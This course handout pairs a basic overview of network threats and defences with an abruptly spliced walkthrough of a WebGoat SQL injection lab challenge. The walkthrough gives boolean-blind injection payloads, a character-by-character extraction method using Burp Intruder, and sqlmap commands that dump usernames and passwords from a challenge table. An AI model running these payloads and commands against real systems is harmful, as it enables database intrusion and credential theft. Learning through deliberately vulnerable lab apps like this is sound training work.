Task – 1
Introduction : Understand the basics of network security by learning about different types of
network threats and how to implement basic security measures. This task will introduce you to the
foundational concepts of securing a small network.
Types of Network Threats
1. Viruses:
o Definition: Malicious software that attaches itself to a host file or program and
spreads when the host is executed.
o Propagation: Viruses require human action to spread, such as downloading an
infected file or executing a malicious attachment.
o Impact: Can corrupt or delete files, steal personal data, and cause system failures.
2. Worms:
o Definition: Self-replicating malware that spreads across networks without needing a
host file.
o Propagation: Exploits vulnerabilities in network services and spreads through local
or wide-area networks.
o Impact: Can cause network congestion, overload servers, and allow attackers to
install backdoors.
3. Trojans:
o Definition: Malicious software disguised as legitimate software. Users unknowingly
execute the malware.
o Propagation: Trojans are often spread through downloads or email attachments.
o Impact: Once installed, they can give attackers control of the system, steal
information, or install other malware.
4. Phishing Attacks:
o Definition: A form of social engineering where attackers trick individuals into
providing sensitive information (like passwords or credit card details) by pretending
to be legitimate entities.
o Propagation: Often occurs via email, instant messaging, or fake websites that
resemble trusted organizations.
o Impact: Can result in identity theft, financial loss, or compromise of sensitive data.
Basic Security Concepts
1. Firewalls:
� o Definition: A security system that monitors and controls incoming and outgoing
network traffic based on predetermined security rules.
o Types:
Network firewalls: These filter traffic between different networks, such as
the internet and an internal network.
Host-based firewalls: Installed on individual devices to filter traffic coming
into and leaving the device.
o Purpose: Prevent unauthorized access to or from a network while allowing
legitimate communication.
2. Encryption:
o Definition: The process of converting data into an unreadable format (ciphertext) to
prevent unauthorized access.
o Types:
Symmetric encryption: Uses the same key for encryption and decryption.
Asymmetric encryption: Uses a pair of public and private keys for encryption
and decryption.
o Purpose: Protects data integrity and confidentiality during storage or transmission.
3. Secure Network Configurations:
o Definition: Proper setup and management of network devices to minimize
vulnerabilities.
o Elements:
Segmentation: Isolating sensitive parts of a network to limit access.
Secure Protocols: Using encrypted communication protocols (e.g., HTTPS,
SSL/TLS, SSH) to ensure secure data transmission.
Regular Patch Management: Keeping network hardware and software up-to-
date to avoid exploitation of vulnerabilities.
o Purpose: Reduces the attack surface and prevents exploitation of misconfigurations
or outdated software.
Understanding these threats and implementing strong security measures like firewalls, encryption,
and secure configurations helps in creating a robust network defense strateg
�As both the registration and the login worked fine with the new user, I can assume that both the
form values I sent over for these two operations where resulting in valid SQL queries.
So what happen if I try to send them again with some attached SQLi test?
newuser' AND '1'='1
From this response I understand that the app is checking if the username already exists by running
the query we provided, thus this statement is a valid TRUE statement since the username already
exists
�newuser' and '1'='2
Hence this is a valid FALSE statement.
This is all we need to ask the database for all its data, as long as the db user is allowed to read them.
In lesson #4 we were given a hint on this problem
AND substring(database_version(),1,1) = '2
By varying the position argument for substring() and the literal value we can then loop through all
positions and see what matches, we can find subsequent character positions of the database values
by using Burp Intruder, this can be done by using a sniper attack on the §2§ with a list such
as https://github.com/xmendez/wfuzz/blob/master/wordlist/stress/alphanum_case_extra.txt and
see what request returns a TRUE statement
�The database value is 2.5.0 on my WebGoat install
I then wanted to automate with sqlmap and see what I could get from the db.
The simplest way I know in order to give sqlmap a proper request is to
submit the initial request and get the response for a TRUE statement from the browser
� copy them from Burp
use the request as input file and the response as string parameter for the TRUE statement in
sqlmap
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
threads 1
current DB is PUBLIC + Boolean Blind SQL
Let’s try to get the table names
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
thread=10 --technique=B --dbms="HSQLDB" -D PUBLIC --tables --level=5 --risk=3
�I would then start by looking at the CHALLENGE_USERS table
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
thread=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS --columns --level=5 --
risk=3
sqlmap asking permission to brute force column names with its wordlist and the result
And get the table rows, this time I have to lower the number of threads due to the number or errors I
was getting with 10 threads on my machine
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
thread=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS -C userid,password --
dump --level=5 --risk=3
�CHALLENGE_USERS table and Tom password
Now we have username and password for Tom and can login on the lesson login form
